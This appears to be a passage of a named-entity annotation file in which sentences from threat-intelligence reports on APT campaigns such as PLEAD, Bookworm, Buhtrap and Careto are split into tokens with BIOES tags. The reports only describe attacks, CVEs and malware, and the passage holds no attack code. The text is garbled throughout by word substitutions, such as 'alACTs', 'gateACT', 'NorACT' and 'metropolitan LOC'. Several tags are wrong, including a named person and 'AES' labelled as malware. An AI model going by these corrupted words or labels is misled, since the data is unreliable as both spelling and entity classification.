+and O
+techniques O
+helped O
+us O
+uncover O
+the O
+proverbial O
+red O
+string O
+of O
+fate O
+that O
+connected O
+three O
+seemingly O
+disparate O
+campaigns S-ACT
+: O
+PLEAD S-ACT
+, O
+Shrouded B-ACT
+Crossbow E-ACT
+, O
+and O
+of O
+late O
+, O
+Waterbear S-ACT
+. O
+
+Active O
+since O
+2012 S-TIME
+, O
+it O
+has O
+so O
+far O
+targeted O
+Taiwanese O
+government B-IDTY
+agencies E-IDTY
+and O
+private O
+organizations O
+. O
+
+PLEAD S-ACT
+uses O
+spear-phishing S-ACT
+emails S-TOOL
+to O
+deliver O
+and O
+install O
+their O
+backdoor O
+, O
+either O
+as O
+an O
+attachment O
+or O
+through O
+links O
+to O
+cloud B-MAL
+storage I-MAL
+services E-MAL
+. O
+
+PLEAD S-ACT
+also O
+dabbled O
+with O
+a O
+short-lived O
+, O
+fileless O
+version O
+of O
+their O
+malware O
+when O
+it O
+obtained O
+an O
+exploit S-VULNAME
+for O
+a O
+Flash S-TOOL
+vulnerability O
+( O
+CVE-2015-5119 S-VULID
+) O
+that O
+was O
+leaked O
+during O
+the O
+Hacking O
+Team O
+breach O
+. O
+
+PLEAD S-ACT
+also O
+uses O
+CVE-2017-7269 S-VULID
+, O
+a O
+buffer O
+overflow O
+vulnerability O
+Microsoft S-IDTY
+Internet B-TOOL
+Information I-TOOL
+Services E-TOOL
+( O
+IIS S-TOOL
+) O
+6.0 O
+to O
+compromise O
+the O
+victim O
+'s O
+server O
+. O
+
+This O
+campaign O
+, O
+first O
+observed O
+in O
+2010 S-TIME
+, O
+is O
+believed O
+to O
+be O
+operated O
+by O
+a O
+well-funded O
+group O
+given O
+how O
+it O
+appeared O
+to O
+have O
+purchased O
+the O
+source O
+code O
+of O
+the O
+BIFROST O
+backdoor O
+, O
+which O
+the O
+operators O
+enhanced O
+and O
+created O
+other O
+tools O
+from O
+. O
+
+Shrouded B-ACT
+Crossbow E-ACT
+targeted O
+privatized B-IDTY
+agencies E-IDTY
+and O
+government B-IDTY
+contractors E-IDTY
+as O
+well O
+as O
+enterprises S-IDTY
+in O
+the O
+consumer B-IDTY
+electronics E-IDTY
+, O
+computer S-IDTY
+, O
+healthcare S-IDTY
+, O
+and O
+financial B-IDTY
+industries E-IDTY
+. O
+
+Shrouded B-ACT
+Crossbow E-ACT
+employs O
+three O
+BIFROST-derived B-MAL
+backdoors E-MAL
+: O
+BIFROSE S-MAL
+, O
+KIVARS S-MAL
+, O
+and O
+XBOW S-MAL
+. O
+
+Like O
+PLEAD S-ACT
+, O
+Shrouded B-ACT
+Crossbow E-ACT
+uses O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+backdoor-laden O
+attachments O
+that O
+utilize O
+the O
+RTLO B-MAL
+technique E-MAL
+and O
+accompanied O
+by O
+decoy B-FILE
+documents E-FILE
+. O
+
+XBOW S-MAL
+'s O
+capabilities O
+are O
+derived O
+from O
+BIFROSE S-MAL
+and O
+KIVARS S-MAL
+; O
+Shrouded B-ACT
+Crossbow E-ACT
+gets O
+its O
+name O
+from O
+its O
+unique O
+mutex O
+format O
+. O
+
+While O
+PLEAD S-MAL
+and O
+KIVARS S-MAL
+are O
+most O
+likely O
+to O
+be O
+used O
+in O
+first O
+phase O
+attacks O
+, O
+Waterbear S-ACT
+can O
+be O
+seen O
+as O
+a O
+secondary O
+backdoor O
+installed O
+after O
+attackers O
+have O
+gained O
+a O
+certain O
+level O
+of O
+privilege O
+. O
+
+Recently O
+, O
+the O
+JPCERT S-SECTEAM
+published O
+a O
+thorough O
+analysis O
+of O
+the O
+Plead B-MAL
+backdoor E-MAL
+, O
+which O
+, O
+according O
+to O
+Trend B-SECTEAM
+Micro E-SECTEAM
+, O
+is O
+used O
+by O
+the O
+cyberespionage O
+group O
+BlackTech O
+. O
+
+Despite O
+the O
+fact O
+that O
+the O
+Changing B-LOC
+Information I-LOC
+Technology I-LOC
+Inc. E-LOC
+certificate O
+was O
+revoked O
+on O
+July B-TIME
+4 E-TIME
+, O
+2017 S-TIME
+, O
+the O
+BlackTech O
+group O
+is O
+still O
+using O
+it O
+to O
+sign O
+their O
+malicious O
+tools O
+. O
+
+The O
+BlackTech O
+group O
+is O
+primarily O
+focused O
+on O
+cyberespionage O
+in O
+Asia S-LOC
+. O
+
+The O
+new O
+activity O
+described O
+in O
+this O
+blogpost O
+was O
+detected O
+by O
+ESET S-SECTEAM
+in O
+Taiwan S-LOC
+, O
+where O
+the O
+Plead S-MAL
+malware S-MAL
+has O
+alACTs O
+been O
+most O
+actively O
+deployed O
+. O
+
+Attackers O
+are O
+targeting O
+Windows S-OS
+platform O
+and O
+aiming O
+at O
+government B-IDTY
+institutions E-IDTY
+as O
+well O
+as O
+big O
+companies O
+in O
+Colombia S-LOC
+. O
+
+Attackers O
+like O
+to O
+use O
+spear-fishing B-ACT
+email E-ACT
+with O
+password O
+protected O
+RAR S-MAL
+attachment O
+to O
+avoid O
+being O
+detected O
+by O
+the O
+email B-ACT
+gateACT E-ACT
+. O
+
+The O
+first O
+sample O
+being O
+captured O
+was O
+in O
+April B-TIME
+2018 E-TIME
+and O
+since O
+that O
+we O
+observed O
+a O
+lot O
+more O
+related O
+ones O
+. O
+
+After O
+performing O
+investigations O
+on O
+the O
+classified O
+victims O
+, O
+we O
+find O
+the O
+attacker O
+targets O
+big O
+companies O
+and O
+government B-IDTY
+agencies E-IDTY
+in O
+Colombia S-LOC
+. O
+
+After O
+monitoring O
+and O
+correlating O
+the O
+APT B-ACT
+attack E-ACT
+, O
+360 B-SECTEAM
+Threat I-SECTEAM
+Intelligence I-SECTEAM
+Center E-SECTEAM
+discovered O
+multiple O
+related O
+emails S-TOOL
+to O
+attack O
+Colombian O
+government B-IDTY
+agencies E-IDTY
+, O
+financial B-IDTY
+institutions E-IDTY
+and O
+large O
+enterprises S-IDTY
+. O
+
+The O
+oldest O
+sample O
+we've O
+seen O
+up O
+to O
+now O
+is O
+from O
+November B-TIME
+2013 E-TIME
+. O
+
+One O
+of O
+the O
+top O
+targets O
+is O
+the O
+Japan S-LOC
+Pension B-IDTY
+Service E-IDTY
+, O
+but O
+the O
+list O
+of O
+targeted O
+industries O
+includes O
+government S-IDTY
+and O
+government B-IDTY
+agencies E-IDTY
+, O
+local B-IDTY
+governments E-IDTY
+, O
+public B-IDTY
+interest I-IDTY
+groups E-IDTY
+, O
+universities S-IDTY
+, O
+banks S-IDTY
+, O
+financial B-IDTY
+services E-IDTY
+, O
+energy S-IDTY
+and O
+so O
+on O
+. O
+
+However O
+, O
+the O
+attack O
+is O
+different O
+in O
+two O
+respects O
+: O
+unlike O
+other O
+APTs O
+, O
+the O
+main O
+focus O
+of O
+Blue B-MAL
+Termite E-MAL
+is O
+to O
+attack O
+Japanese S-LOC
+organizations O
+; O
+and O
+most O
+of O
+their O
+C2s O
+are O
+located O
+in O
+Japan S-LOC
+. O
+
+Originally O
+, O
+the O
+main O
+infection O
+vector O
+of O
+Blue B-MAL
+Termite E-MAL
+was O
+spear-phishing S-ACT
+emails S-TOOL
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+has O
+detected O
+a O
+new O
+method O
+of O
+first O
+infection O
+that O
+uses O
+a O
+drive-by-download O
+with O
+a O
+flash S-TOOL
+exploit S-VULNAME
+( O
+CVE-2015-5119 S-VULID
+, O
+the O
+one O
+leaked O
+from O
+The O
+Hacking O
+Team O
+incident O
+) O
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+also O
+found O
+some O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+, O
+including O
+one O
+on O
+a O
+website O
+belonging O
+to O
+a O
+prominent O
+member O
+of O
+the O
+Japanese B-LOC
+government E-LOC
+. O
+
+In O
+early O
+July B-TIME
+2015 E-TIME
+, O
+however O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+found O
+a O
+sample O
+that O
+creates O
+a O
+decryption O
+key O
+with O
+Salt1 O
+, O
+Salt2 O
+, O
+and O
+Salt3 O
+. O
+
+From O
+early O
+June S-TIME
+, O
+when O
+the O
+cyber-attack O
+on O
+the O
+Japan S-LOC
+Pension B-IDTY
+Service E-IDTY
+started O
+to O
+be O
+reported O
+widely O
+, O
+various O
+Japanese S-LOC
+organizations O
+would O
+have O
+started O
+to O
+deploy O
+protection O
+measures O
+. O
+
+It O
+employs O
+AES S-MAL
+in O
+addition O
+to O
+SID S-MAL
+tricks O
+, O
+making O
+it O
+difficult O
+to O
+decrypt O
+sensitive O
+data O
+. O
+
+In O
+order O
+to O
+fight O
+back O
+against O
+this O
+cyber-espionage O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+will O
+continue O
+its O
+research O
+. O
+
+Bookworm S-MAL
+'s O
+functional O
+code O
+is O
+radically O
+different O
+from O
+PlugX S-MAL
+and O
+has O
+a O
+rather O
+unique O
+modular O
+architecture O
+that O
+warranted O
+additional O
+analysis O
+by O
+Unit B-SECTEAM
+42 E-SECTEAM
+. O
+
+Bookworm S-MAL
+has O
+little O
+malicious O
+functionality O
+built-in O
+, O
+with O
+its O
+only O
+core O
+ability O
+involving O
+stealing O
+keystrokes O
+and O
+clipboard O
+contents O
+. O
+
+The O
+Plead S-MAL
+malware S-MAL
+is O
+a O
+backdoor S-MAL
+which O
+, O
+according O
+to O
+Trend B-SECTEAM
+Micro E-SECTEAM
+, O
+is O
+used O
+by O
+the O
+BlackTech O
+group O
+in O
+targeted B-ACT
+attacks E-ACT
+. O
+
+So O
+far O
+, O
+it O
+appears O
+threat O
+actors O
+have O
+deployed O
+the O
+Bookworm B-MAL
+Trojan E-MAL
+primarily O
+in O
+attacks O
+on O
+targets O
+in O
+Thailand S-LOC
+. O
+
+The O
+threat O
+actors O
+use O
+a O
+commercial O
+installation O
+tool O
+called O
+Smart B-MAL
+Installer I-MAL
+Maker E-MAL
+to O
+encapsulate O
+and O
+execute O
+a O
+self-extracting B-MAL
+RAR E-MAL
+archive O
+and O
+in O
+some O
+cases O
+a O
+decoy B-MAL
+slideshow E-MAL
+or O
+Flash B-MAL
+installation I-MAL
+application E-MAL
+. O
+
+The O
+self-extracting B-MAL
+RAR E-MAL
+writes O
+a O
+legitimate O
+executable O
+, O
+an O
+actor-created O
+DLL S-TOOL
+called O
+Loader.dll S-FILE
+and O
+a O
+file O
+named O
+readme.txt S-FILE
+to O
+the O
+filesystem O
+and O
+then O
+executes O
+the O
+legitimate O
+executable O
+. O
+
+targeted B-ACT
+attacks E-ACT
+. O
+
+Using O
+XREFs S-MAL
+during O
+static O
+analysis O
+is O
+a O
+common O
+technique O
+to O
+quickly O
+find O
+where O
+functions O
+of O
+interest O
+are O
+called O
+. O
+
+The O
+developers O
+designed O
+Bookworm S-MAL
+to O
+be O
+a O
+modular B-MAL
+Trojan E-MAL
+not O
+limited O
+to O
+just O
+the O
+initial O
+architecture O
+of O
+the O
+Trojan S-MAL
+, O
+as O
+Bookworm S-MAL
+can O
+also O
+load O
+additional O
+modules O
+provided O
+by O
+the O
+C2 S-TOOL
+server O
+. O
+
+Although O
+the O
+developers O
+of O
+Bookworm S-MAL
+have O
+included O
+only O
+keylogging O
+functionality O
+in O
+Bookworm S-MAL
+as O
+a O
+core O
+ability O
+, O
+as O
+suggested O
+in O
+Table O
+1 O
+, O
+several O
+of O
+the O
+embedded O
+DLLs O
+provide O
+Leader O
+with O
+cryptographic O
+and O
+hashing O
+functions O
+, O
+while O
+others O
+support O
+Leader S-MAL
+'s O
+ability O
+to O
+communicate O
+with O
+its O
+C2 S-TOOL
+server O
+. O
+
+While O
+we O
+did O
+not O
+discuss O
+the O
+surrounding B-ACT
+attacks E-ACT
+using O
+Bookworm S-MAL
+in O
+detail O
+, O
+we O
+have O
+observed O
+threat O
+actors O
+deploying O
+Bookworm S-MAL
+primarily O
+in O
+attacks O
+on O
+targets O
+in O
+Thailand S-LOC
+. O
+
+Also O
+, O
+Bookworm S-MAL
+uses O
+a O
+combination O
+of O
+encryption O
+and O
+compression O
+algorithms O
+to O
+obfuscate O
+the O
+traffic O
+between O
+the O
+system O
+and O
+C2 S-TOOL
+server O
+. O
+
+The O
+developers O
+of O
+Bookworm S-MAL
+have O
+gone O
+to O
+great O
+lengths O
+to O
+create O
+a O
+modular O
+framework O
+that O
+is O
+very O
+flexible O
+through O
+its O
+ability O
+to O
+run O
+additional O
+modules O
+directly O
+from O
+its O
+C2 S-TOOL
+server O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+recently O
+published O
+a O
+blog O
+on O
+a O
+newly O
+identified O
+Trojan S-MAL
+called O
+Bookworm S-MAL
+, O
+which O
+discussed O
+the O
+architecture O
+and O
+capabilities O
+of O
+the O
+malware O
+and O
+alluded O
+to O
+Thailand S-LOC
+being O
+the O
+focus O
+of O
+the O
+threat O
+actors' O
+campaigns S-ACT
+. O
+
+Leader S-MAL
+is O
+Bookworm S-MAL
+'s O
+main O
+module O
+and O
+controls O
+all O
+of O
+the O
+activities S-ACT
+of O
+the O
+Trojan S-MAL
+, O
+but O
+relies O
+on O
+the O
+additional O
+DLLs S-FILE
+to O
+provide O
+specific O
+functionality O
+. O
+
+The O
+developers O
+of O
+Bookworm S-MAL
+use O
+these O
+modules O
+in O
+a O
+rather O
+unique O
+ACT O
+, O
+as O
+the O
+other O
+embedded O
+DLLs O
+provide O
+API O
+functions O
+for O
+Leader S-MAL
+to O
+carry O
+out O
+its O
+tasks O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+does O
+not O
+have O
+detailed O
+targeting O
+information O
+for O
+all O
+known O
+Bookworm B-MAL
+samples E-MAL
+, O
+but O
+we O
+are O
+aware O
+of O
+attempted O
+attacks O
+on O
+at O
+least O
+two O
+branches O
+of O
+government S-IDTY
+in O
+Thailand O
+. O
+
+We O
+speculate O
+that O
+other O
+attacks O
+delivering O
+Bookworm S-MAL
+were O
+also O
+targeting O
+organizations O
+in O
+Thailand S-LOC
+based O
+on O
+the O
+contents O
+of O
+the O
+associated O
+decoys B-FILE
+documents E-FILE
+, O
+as O
+well O
+as O
+several O
+of O
+the O
+dynamic B-MAL
+DNS I-MAL
+domain E-MAL
+names O
+used O
+to O
+host O
+C2 S-TOOL
+servers O
+that O
+contain O
+the O
+words O
+" O
+Thai S-LOC
+" O
+or O
+" O
+Thailand S-LOC
+" O
+. O
+
+We O
+believe O
+that O
+it O
+is O
+likely O
+threat O
+actors O
+will O
+continue O
+development O
+Bookworm S-MAL
+, O
+and O
+will O
+continue O
+to O
+use O
+it O
+for O
+the O
+foreseeable O
+future O
+. O
+
+Threat O
+actors O
+have O
+delivered O
+Bookworm S-MAL
+as O
+a O
+payload O
+in O
+attacks O
+on O
+targets O
+in O
+Thailand S-LOC
+. O
+
+Analysis O
+of O
+compromised O
+systems O
+seen O
+communicating O
+with O
+Bookworm B-MAL
+C2 I-MAL
+servers E-MAL
+also O
+confirms O
+our O
+speculation O
+on O
+targeting O
+with O
+a O
+majority O
+of O
+systems O
+existing O
+within O
+Thailand S-LOC
+. O
+
+As O
+mentioned O
+in O
+our O
+previous O
+blog O
+on O
+Bookworm S-MAL
+, O
+the O
+Trojan S-MAL
+sends O
+a O
+static O
+date O
+string O
+to O
+the O
+C2 S-TOOL
+server O
+that O
+we O
+referred O
+to O
+as O
+a O
+campaign O
+code O
+. O
+
+We O
+believed O
+that O
+the O
+actors O
+would O
+use O
+this O
+date B-MAL
+code E-MAL
+to O
+track O
+their O
+attack B-ACT
+campaigns E-ACT
+; O
+however O
+, O
+after O
+continued O
+analysis O
+of O
+the O
+malware O
+, O
+we O
+think O
+these O
+static O
+dates O
+could O
+also O
+be O
+a O
+build O
+identifier O
+for O
+the O
+Trojan S-MAL
+. O
+
+Threat O
+actors O
+may O
+use O
+the O
+date B-FILE
+string I-FILE
+hardcoded E-FILE
+into O
+each O
+Bookworm B-MAL
+sample E-MAL
+as O
+a O
+build O
+identifier O
+. O
+
+A O
+Trojan S-MAL
+sending O
+a O
+build O
+identifier O
+to O
+its O
+C2 S-TOOL
+server O
+is O
+quite O
+common O
+, O
+as O
+it O
+notifies O
+the O
+threat O
+actors O
+of O
+the O
+specific O
+version O
+of O
+the O
+Trojan S-MAL
+in O
+which O
+they O
+are O
+interacting O
+. O
+
+Due O
+to O
+these O
+changes O
+without O
+a O
+new O
+date B-FILE
+string E-FILE
+, O
+we O
+believe O
+the O
+date B-FILE
+codes E-FILE
+are O
+used O
+for O
+campaign O
+tracking O
+rather O
+than O
+a O
+Bookworm S-MAL
+build O
+identifier O
+. O
+
+We O
+believe O
+that O
+Bookworm B-MAL
+samples E-MAL
+use O
+the O
+static O
+date O
+string O
+as O
+campaign O
+codes O
+, O
+which O
+we O
+used O
+to O
+determine O
+the O
+approximate O
+date O
+of O
+each O
+attack O
+that O
+we O
+did O
+not O
+have O
+detailed O
+targeting O
+information O
+. O
+
+Another O
+decoy B-FILE
+slideshow E-FILE
+associated O
+with O
+the O
+Bookworm B-ACT
+attack I-ACT
+campaign E-ACT
+contains O
+photos O
+of O
+an O
+event O
+called O
+Bike O
+for O
+Dad O
+2015 S-TIME
+. O
+
+The O
+campaign O
+code O
+" O
+20150920 O
+" O
+is O
+associated O
+with O
+this O
+decoy O
+, O
+which O
+is O
+a O
+week O
+prior O
+to O
+media S-IDTY
+articles O
+announcing O
+that O
+the O
+Crown O
+Price O
+of O
+Thailand O
+Maha O
+Vajiralongkorn O
+will O
+lead O
+the O
+Bike O
+for O
+Dad O
+2015 S-TIME
+event O
+. O
+
+Chitpas O
+is O
+heavily O
+involved O
+with O
+Thailand O
+politics S-IDTY
+and O
+was O
+a O
+core O
+leader O
+of O
+the O
+People B-IDTY
+'s I-IDTY
+Committee I-IDTY
+for I-IDTY
+Absolute I-IDTY
+Democracy E-IDTY
+( O
+PCAD S-IDTY
+) O
+, O
+which O
+is O
+an O
+organization O
+that O
+staged O
+anti-government B-ACT
+campaigns E-ACT
+in O
+2013 S-TIME
+and O
+2014 S-TIME
+. O
+
+The O
+final O
+remaining O
+known O
+decoy S-MAL
+includes O
+photos O
+of O
+Chitpas B-MAL
+Tant I-MAL
+Kridakon E-MAL
+( O
+Figure O
+7 O
+) O
+, O
+who O
+is O
+known O
+as O
+heiress O
+to O
+the O
+largest O
+brewery O
+in O
+Thailand O
+. O
+
+These O
+images O
+were O
+associated O
+with O
+the O
+Bookworm B-ACT
+campaign E-ACT
+code O
+" O
+20150905 O
+" O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+analyzed O
+the O
+systems O
+communicating O
+with O
+the O
+Bookworm S-MAL
+C2 S-TOOL
+domains O
+and O
+found O
+that O
+a O
+majority O
+of O
+the O
+IP S-PROT
+addresses O
+existed O
+within O
+autonomous O
+systems O
+located O
+in O
+Thailand S-LOC
+. O
+
+The O
+pie O
+chart O
+in O
+Figure O
+8 O
+shows O
+that O
+the O
+vast O
+majority O
+( O
+73% O
+) O
+of O
+the O
+hosts O
+are O
+geographically O
+located O
+in O
+Thailand O
+, O
+which O
+matches O
+the O
+known O
+targeting O
+of O
+this O
+threat O
+group O
+. O
+
+We O
+believe O
+that O
+the O
+IP S-PROT
+addresses O
+from O
+Canada S-LOC
+, O
+Russia S-LOC
+and O
+NorACT S-LOC
+are O
+analysis O
+systems O
+of O
+antivirus B-IDTY
+companies E-IDTY
+or O
+security O
+researchers O
+. O
+
+Overall O
+, O
+the O
+Bookworm S-MAL
+infrastructure O
+overlaps O
+with O
+the O
+infrastructure O
+hosting O
+C2 S-TOOL
+servers O
+used O
+by O
+various O
+attack O
+tools O
+, O
+including O
+FFRAT S-MAL
+, O
+Poison B-MAL
+Ivy E-MAL
+, O
+PlugX S-MAL
+, O
+and O
+others O
+. O
+
+Overall O
+, O
+the O
+Bookworm S-MAL
+infrastructure O
+overlaps O
+with O
+the O
+infrastructure O
+hosting O
+C2 S-TOOL
+servers O
+used O
+by O
+various O
+attack O
+tools O
+, O
+including O
+FFRAT S-MAL
+, O
+Poison B-MAL
+Ivy E-MAL
+, O
+PlugX S-MAL
+, O
+and O
+others O
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+enumerated O
+the O
+threat O
+infrastructure O
+related O
+to O
+Bookworm S-MAL
+and O
+created O
+a O
+chart O
+to O
+visualize O
+connected O
+entities O
+to O
+its O
+current O
+attack B-ACT
+campaign E-ACT
+. O
+
+Threat O
+actors O
+have O
+targeted O
+the O
+government S-IDTY
+of O
+Thailand O
+and O
+delivered O
+the O
+newly O
+discovered O
+Bookworm B-MAL
+Trojan E-MAL
+since O
+July B-TIME
+2015 E-TIME
+. O
+
+The O
+actors O
+appear O
+to O
+follow O
+a O
+set O
+playbook O
+, O
+as O
+the O
+observed O
+TTPs O
+are O
+fairly O
+static O
+within O
+each O
+attack O
+in O
+this O
+campaign O
+. O
+
+So O
+far O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+has O
+seen O
+infrastructure O
+overlaps O
+with O
+servers O
+hosting O
+C2 S-TOOL
+servers O
+for O
+samples O
+of O
+the O
+FFRAT S-MAL
+, O
+PlugX S-MAL
+, O
+Poison B-MAL
+Ivy E-MAL
+and O
+Scieron B-MAL
+Trojans E-MAL
+, O
+suggesting O
+that O
+the O
+threat O
+actors O
+use O
+these O
+tools O
+as O
+the O
+payload O
+in O
+their O
+attacks O
+. O
+
+The O
+threat O
+actors O
+have O
+continually O
+used O
+Flash B-MAL
+Player I-MAL
+installers E-MAL
+and O
+Flash B-MAL
+slideshows E-MAL
+for O
+decoys O
+. O
+
+The O
+vast O
+majority O
+of O
+systems O
+communicating O
+with O
+Bookworm S-MAL
+C2 S-TOOL
+servers O
+are O
+within O
+the O
+Bangkok O
+metropolitan O
+LOC O
+where O
+a O
+majority O
+of O
+the O
+government S-IDTY
+of O
+Thailand O
+exists O
+. O
+
+Buhtrap S-APT
+has O
+been O
+active O
+since O
+2014 S-TIME
+, O
+however O
+their O
+first O
+attacks O
+against O
+financial B-IDTY
+institutions E-IDTY
+were O
+only O
+detected O
+in O
+August B-TIME
+2015 E-TIME
+. O
+
+At O
+the O
+moment O
+, O
+the O
+group O
+is O
+known O
+to O
+target O
+Russian O
+and O
+Ukrainian S-LOC
+banks S-IDTY
+. O
+
+Buhtrap S-APT
+is O
+the O
+first O
+hacker O
+group O
+using O
+a O
+network B-ACT
+worm E-ACT
+to O
+infect O
+the O
+overall O
+bank S-IDTY
+infrastructure O
+that O
+significantly O
+increases O
+the O
+difficulty O
+of O
+removing O
+all O
+malicious O
+functions O
+from O
+the O
+network O
+. O
+
+Malicious O
+programs O
+intentionally O
+scan O
+for O
+machines O
+with O
+an O
+automated O
+Bank-Customer O
+system O
+of O
+the O
+Central O
+bank S-IDTY
+of O
+Russia S-LOC
+( O
+further O
+referred O
+to O
+as O
+BCS O
+CBR O
+) O
+. O
+
+If O
+the O
+document O
+was O
+delivered O
+with O
+macros O
+instead O
+of O
+exploits O
+( O
+CVE-2012-0158 S-VULID
+, O
+CVE-2013-3906 S-VULID
+or O
+CVE-2014-1761 S-VULID
+) O
+, O
+then O
+the O
+document O
+contained O
+instructions O
+for O
+enabling O
+macros O
+. O
+
+We O
+noticed O
+that O
+criminals O
+were O
+spreading O
+Buhtrap S-APT
+using O
+this O
+method O
+from O
+May B-TIME
+2015 E-TIME
+to O
+August B-TIME
+2015 E-TIME
+. O
+
+It O
+is O
+worth O
+noting O
+that O
+attackers O
+used O
+the O
+same O
+compromised B-MAL
+websites E-MAL
+to O
+spread O
+Buhtrap S-MAL
+as O
+those O
+that O
+had O
+been O
+used O
+for O
+the O
+Corkow B-MAL
+Trojan E-MAL
+. O
+
+Moreover O
+, O
+they O
+used O
+the O
+same O
+exploit S-VULNAME
+kit B-VULNAME
+Niteris E-VULNAME
+as O
+that O
+in O
+the O
+Corkow S-MAL
+case O
+. O
+
+Purportedly O
+during O
+one O
+of O
+the O
+first O
+attacks O
+hackers O
+intercepted O
+the O
+mailing O
+list O
+of O
+the O
+Anti-drop O
+" O
+club O
+and O
+created O
+a O
+specific O
+phishing B-ACT
+email E-ACT
+for O
+its O
+members O
+. O
+
+However O
+, O
+it O
+is O
+still O
+widely O
+used O
+, O
+notably O
+in O
+Russia S-LOC
+. O
+
+As O
+noted O
+in O
+our O
+previous O
+blog O
+on O
+Buhtrap O
+, O
+this O
+gang O
+has O
+been O
+actively O
+targeting O
+Russian O
+businesses S-IDTY
+, O
+mostly O
+through O
+spear-phishing S-ACT
+. O
+
+It O
+is O
+thus O
+interesting O
+to O
+see O
+Buhtrap O
+add O
+strategic B-ACT
+web I-ACT
+compromises E-ACT
+to O
+their O
+arsenal O
+. O
+
+The O
+first O
+malware O
+we O
+saw O
+was O
+the O
+lurk B-MAL
+downloader E-MAL
+, O
+which O
+was O
+distributed O
+on O
+October B-TIME
+26th E-TIME
+. O
+
+The O
+executable O
+would O
+install O
+the O
+real O
+Ammyy O
+product O
+, O
+but O
+would O
+also O
+launch O
+a O
+file O
+called O
+either O
+AmmyyService.exe S-FILE
+or O
+AmmyySvc.exe S-FILE
+which O
+contained O
+the O
+malicious O
+payload O
+. O
+
+Buhtrap S-APT
+is O
+getting O
+better O
+at O
+disguising O
+the O
+code O
+they O
+inject O
+into O
+compromised B-MAL
+websites E-MAL
+. O
+
+With O
+the O
+recent O
+arrests O
+of O
+actors O
+using O
+the O
+Lurk B-MAL
+banking I-MAL
+trojan E-MAL
+, O
+Buhtrap O
+appears O
+to O
+be O
+a O
+likely O
+alternative O
+for O
+actors O
+wishing O
+to O
+target O
+Russian S-LOC
+banks S-IDTY
+and O
+software O
+. O
+
+They O
+have O
+different O
+functions O
+and O
+ACTs O
+of O
+spreading O
+, O
+but O
+the O
+same O
+purpose O
+— O
+to O
+steal O
+money O
+from O
+the O
+accounts O
+of O
+businesses S-IDTY
+. O
+
+Our O
+experts O
+have O
+found O
+that O
+cybercriminals O
+are O
+actively O
+focusing O
+on O
+SMBs S-MAL
+, O
+and O
+giving O
+particular O
+attention O
+to O
+accountants S-IDTY
+. O
+
+The O
+first O
+encounter O
+with O
+Buhtrap O
+was O
+registered O
+back O
+in O
+2014 S-TIME
+. O
+
+For O
+now O
+, O
+we O
+can O
+call O
+RTM S-MAL
+one O
+of O
+the O
+most O
+active O
+financial S-IDTY
+Trojans O
+. O
+
+At O
+that O
+time O
+it O
+was O
+the O
+name O
+of O
+a O
+cybercriminal O
+group O
+that O
+was O
+stealing O
+money O
+from O
+Russian S-LOC
+financial B-IDTY
+establishments E-IDTY
+— O
+to O
+the O
+tune O
+of O
+at O
+least O
+$150,000 O
+per O
+hit O
+. O
+
+Buhtrap O
+resurfaced O
+in O
+the O
+beginning O
+of O
+2017 S-TIME
+in O
+the O
+TwoBee B-ACT
+campaign E-ACT
+, O
+where O
+it O
+served O
+primarily O
+as O
+means O
+of O
+malware O
+delivery O
+. O
+
+After O
+the O
+source O
+codes O
+of O
+their O
+tools O
+became O
+public O
+in O
+2016 S-TIME
+, O
+the O
+name O
+Buhtrap O
+was O
+used O
+for O
+the O
+financial B-MAL
+Trojan E-MAL
+. O
+
+Just O
+like O
+last O
+time O
+, O
+Buhtrap O
+is O
+spreading O
+through O
+exploits O
+embedded O
+in O
+news B-IDTY
+outlets E-IDTY
+. O
+
+Estimating O
+the O
+damages O
+is O
+challenging O
+, O
+but O
+as O
+we O
+learned O
+, O
+the O
+criminals O
+are O
+siphoning O
+off O
+assets O
+in O
+transactions O
+that O
+do O
+not O
+exceed O
+$15,000 O
+each O
+. O
+
+As O
+explained O
+later O
+, O
+we O
+believe O
+this O
+campaign O
+is O
+financially-motivated O
+and O
+that O
+it O
+targets O
+accounting B-IDTY
+departments E-IDTY
+in O
+Russian O
+businesses S-IDTY
+. O
+
+" O
+Buhgalter O
+" O
+means O
+" O
+accountant O
+" O
+in O
+Russian S-LOC
+. O
+
+Seeing O
+a O
+campaign O
+like O
+this O
+, O
+inevitably O
+the O
+Anunak/Carbanak S-MAL
+documented O
+by O
+Fox-IT S-SECTEAM
+and O
+Kaspersky S-SECTEAM
+comes O
+to O
+mind O
+. O
+
+The O
+infection O
+vector O
+is O
+similar O
+, O
+it O
+uses O
+a O
+similar O
+modified O
+mimikatz S-MAL
+application O
+, O
+and O
+it O
+uses O
+a O
+third-party B-MAL
+remote I-MAL
+access I-MAL
+tool E-MAL
+, O
+changes O
+system O
+settings O
+to O
+allow O
+concurrent O
+RDP S-MAL
+sessions O
+, O
+and O
+so O
+on O
+. O
+
+The O
+second O
+, O
+aptly O
+titled O
+" O
+kontrakt87.doc S-FILE
+" O
+, O
+copies O
+a O
+generic O
+telecommunications B-IDTY
+service E-IDTY
+contract O
+from O
+MegaFon S-IDTY
+, O
+a O
+large O
+Russian S-LOC
+mobile B-IDTY
+phone I-IDTY
+operator E-IDTY
+. O
+
+In O
+addition O
+to O
+built-in O
+functionalities O
+, O
+the O
+operators O
+of O
+Careto S-FILE
+can O
+upload O
+additional O
+modules O
+which O
+can O
+perform O
+any O
+malicious O
+task O
+. O
+
+Careto S-FILE
+'s O
+Mask B-ACT
+campaign E-ACT
+we O
+discovered O
+relies O
+on O
+spear-phishing S-ACT
+e-mails E-ACT
+with O
+links O
+to O
+a O
+malicious O
+website O
+. O
+
+Sometimes O
+, O
+the O
+attackers O
+use O
+sub-domains S-MAL
+on O
+the O
+exploit S-VULNAME
+websites O
+, O
+to O
+make O
+them O
+seem O
+more O
+legitimate O
+. O
+
+These O
+sub-domains O
+simulate O
+sub-sections O
+of O
+the O
+main O
+newspapers S-IDTY
+in O
+Spain S-LOC
+plus O
+some O
+international O
+ones O
+like O
+the O
+Guardian O
+and O
+the O
+Washington B-IDTY
+Post E-IDTY
+. O
+
+The O
